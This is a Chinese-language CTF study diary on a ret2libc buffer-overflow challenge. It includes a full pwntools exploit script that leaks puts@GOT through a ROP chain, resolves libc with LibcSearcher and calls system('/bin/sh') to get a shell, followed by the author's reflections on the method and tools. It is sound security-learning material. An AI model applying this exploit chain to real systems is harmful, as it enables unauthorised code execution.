day6
ret2libc
基本上可以了,这个类型的题目,最后再来一题
思路
没找到明显的提权函数,还是直接泄露一下got表
ROPgadget --binary pwn --only 'pop|ret'
进IDA里找一下要用到的的地址
利用ROPgadget(一种方便找gadgets片段的工具)找到向rdi寄存器赋值的rdi以及用来吃掉返回值的ret。然后找到puts函数的plt地址以及got地址,用来进行got表泄露。在找到main函数地址,用来重复执行main函数。
找齐之后就可以进行第一次泄露了
exp上半部分:
from pwn import *
from LibcSearcher import *
# sh = remote("node4.anna.nssctf.cn",28983)
sh = process('./pwn')
puts_plt = 0x400520
puts_got = 0x601018
pop_rdi_ret = 0x400763
pop_ret = 0x400509
main_addr = 0x4006D6
payload = b'a'*0x18 + p64(pop_ret) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) + b'\x00'
sh.sendline(payload)
随后接受程序发来的got表后六位的地址信息,将该地址减去puts函数在libc中的相对基址的偏移,得到基址的绝对地址。
随后用基址的绝对地址加上system和str_bin_sh的相对偏移,得到其绝对地址,随后正常调用即可。
exp下半部分:
puts_addr = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a'*0x18 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.sendline(payload)
sh.interactive()
反思
最后的最后,来说一下收获吧
这段时间对ret2libc的了解不断加深
首先,这类题目需要程序中加载有libc模块,并且没有对此进行限制,比如关闭输入输出流,让你没法进行got表泄露。其他的应该就没啥限制了吧,感觉这种方法的适用性挺大的(不要听我一个菜鸟胡说八道)。
下面来简单讲一下基本方法以及一些工具的使用
基本思路就是
- 找到可以用来输出的方法,把got表中的任意一个值泄露出来。
- 取得泄露的值,通过对比位置的方法找到对应libc版本,然后根据相对偏移量以及之前泄露的got来计算要用到函数在内存上的地址(绝对地址)。
- 利用得到地址编写攻击代码。
一般来说,要用的的工具都有ROPgadget,pwngdb,LibcSearcher。
当然,以上三个是我这段时间使用的工具,分别是用来进行查找gadgets片段、调试、以及对比查找libc库 的。
不足
讲一下我目前可以看到的自身的不足吧,我没见过开启PIE保护的这类题目,感觉这类题目应该会很不一样。有时间或者有机会一定要看一下。